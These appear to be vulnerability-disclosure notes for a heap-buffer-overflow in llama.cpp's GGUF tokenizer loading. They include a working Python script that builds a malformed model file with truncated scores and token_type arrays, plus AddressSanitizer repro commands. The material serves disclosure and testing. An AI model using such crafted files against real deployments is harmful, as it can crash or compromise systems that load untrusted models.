Huntr submission notes
This folder contains a status summary and repro steps for a heap-buffer-overflow in llama.cpp's GGUF tokenizer metadata parsing.
Files
- huntr_submission/STATUS.md (status summary)
- tmp/gguf_fuzz/llama-spm-bad-scores.gguf (PoC model file)
- models/ggml-vocab-llama-spm.gguf (base model file)
PoC generation
- The PoC is created by truncating the tokenizer.ggml.scores and tokenizer.ggml.token_type arrays by one element each, while tokenizer.ggml.tokens keeps its full length, so the vocab loader reads one element past the end of the shortened arrays.
- Script used:
import struct
from pathlib import Path

in_path = Path('models/ggml-vocab-llama-spm.gguf')
out_path = Path('tmp/gguf_fuzz/llama-spm-bad-scores.gguf')

# GGUF metadata value types: 0=uint8, 1=int8, 2=uint16, 3=int16, 4=uint32,
# 5=int32, 6=float32, 7=bool, 8=string, 9=array, 10=uint64, 11=int64, 12=float64.
GGUF_TYPE_SIZES = {
    0: 1, 1: 1, 2: 2, 3: 2, 4: 4, 5: 4, 6: 4, 7: 1, 8: None, 9: None, 10: 8, 11: 8, 12: 8,
}
GGUF_TYPE_FORMAT = {
    0: '<B', 1: '<b', 2: '<H', 3: '<h', 4: '<I', 5: '<i', 6: '<f', 7: '<b', 10: '<Q', 11: '<q', 12: '<d',
}

def read_exact(f, n):
    b = f.read(n)
    if len(b) != n:
        raise EOFError('unexpected EOF')
    return b

def read_u32(f): return struct.unpack('<I', read_exact(f, 4))[0]
def read_i32(f): return struct.unpack('<i', read_exact(f, 4))[0]
def read_u64(f): return struct.unpack('<Q', read_exact(f, 8))[0]
def read_i64(f): return struct.unpack('<q', read_exact(f, 8))[0]

def read_string(f):
    # GGUF string: uint64 length followed by raw bytes.
    n = read_u64(f)
    return read_exact(f, n)

def parse_file(path):
    # Parse the GGUF header and KV metadata section only. Tensor info/data
    # are not read; this assumes the vocab-only base model contains nothing
    # beyond header + KV.
    with open(path, 'rb') as f:
        magic = read_exact(f, 4)
        version = read_u32(f)
        n_tensors = read_i64(f)
        n_kv = read_i64(f)
        kv_list = []
        for _ in range(n_kv):
            key = read_string(f)
            vtype = read_i32(f)
            if vtype == 9:  # array: element type, element count, elements
                arr_type = read_i32(f)
                arr_len = read_u64(f)
                if arr_type == 8:  # array of strings
                    vals = [read_string(f) for _ in range(arr_len)]
                else:  # array of fixed-size scalars
                    size = GGUF_TYPE_SIZES[arr_type]
                    data = read_exact(f, size * arr_len)
                    fmt = GGUF_TYPE_FORMAT[arr_type]
                    vals = list(struct.unpack('<' + fmt[1] * arr_len, data))
                kv_list.append((key, vtype, arr_type, vals))
            elif vtype == 8:  # string
                val = read_string(f)
                kv_list.append((key, vtype, None, val))
            else:  # fixed-size scalar
                size = GGUF_TYPE_SIZES[vtype]
                val = struct.unpack(GGUF_TYPE_FORMAT[vtype], read_exact(f, size))[0]
                kv_list.append((key, vtype, None, val))
    return magic, version, n_tensors, kv_list

def write_file(path, magic, version, n_tensors, kv_list):
    # Write the header and KV section back out. n_tensors is copied verbatim
    # and no tensor section is emitted (see the note in parse_file).
    with open(path, 'wb') as f:
        f.write(magic)
        f.write(struct.pack('<I', version))
        f.write(struct.pack('<q', n_tensors))
        f.write(struct.pack('<q', len(kv_list)))
        for key, vtype, arr_type, val in kv_list:
            f.write(struct.pack('<Q', len(key)))
            f.write(key)
            f.write(struct.pack('<i', vtype))
            if vtype == 9:
                f.write(struct.pack('<i', arr_type))
                f.write(struct.pack('<Q', len(val)))
                if arr_type == 8:
                    for s in val:
                        f.write(struct.pack('<Q', len(s)))
                        f.write(s)
                else:
                    fmt = GGUF_TYPE_FORMAT[arr_type]
                    f.write(struct.pack('<' + fmt[1] * len(val), *val))
            elif vtype == 8:
                f.write(struct.pack('<Q', len(val)))
                f.write(val)
            else:
                f.write(struct.pack(GGUF_TYPE_FORMAT[vtype], val))

magic, version, n_tensors, kv_list = parse_file(in_path)

# Truncate the scores and token_type arrays by one element each;
# tokenizer.ggml.tokens keeps its original length.
new_kv = []
for key, vtype, arr_type, val in kv_list:
    if key == b'tokenizer.ggml.scores' and vtype == 9:
        val = val[:-1]
    if key == b'tokenizer.ggml.token_type' and vtype == 9:
        val = val[:-1]
    new_kv.append((key, vtype, arr_type, val))

out_path.parent.mkdir(parents=True, exist_ok=True)
write_file(out_path, magic, version, n_tensors, new_kv)
print('wrote', out_path)
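- Sanity check (optional): a minimal sketch reusing the parse_file helper from the script above, run in the same session, to confirm the length mismatch in the generated PoC:

# The scores/token_type arrays should now be one element shorter
# than the tokens array.
_, _, _, kv = parse_file(out_path)
lens = {key: len(val) for key, vtype, _, val in kv if vtype == 9}
n_tokens = lens[b'tokenizer.ggml.tokens']
assert lens[b'tokenizer.ggml.scores'] == n_tokens - 1
assert lens[b'tokenizer.ggml.token_type'] == n_tokens - 1
print('tokens:', n_tokens, 'scores:', lens[b'tokenizer.ggml.scores'])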
Repro (ASan)
cmake -B build-asan -DLLAMA_SANITIZE_ADDRESS=ON -DLLAMA_SANITIZE_UNDEFINED=ON -DGGML_SANITIZE_ADDRESS=ON -DGGML_SANITIZE_UNDEFINED=ON -DGGML_CCACHE=OFF -DLLAMA_BUILD_TESTS=ON -DLLAMA_BUILD_EXAMPLES=ON -DLLAMA_BUILD_TOOLS=ON -DLLAMA_BUILD_SERVER=OFF -DCMAKE_BUILD_TYPE=RelWithDebInfo
cmake --build build-asan --target llama-tokenize -j $(getconf _NPROCESSORS_ONLN)
./build-asan/bin/llama-tokenize -m tmp/gguf_fuzz/llama-spm-bad-scores.gguf -p "hello"
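- Expected result: on an affected build, llama-tokenize should abort with an AddressSanitizer heap-buffer-overflow report during vocab loading instead of printing the tokenization of "hello" (exact report contents depend on the build).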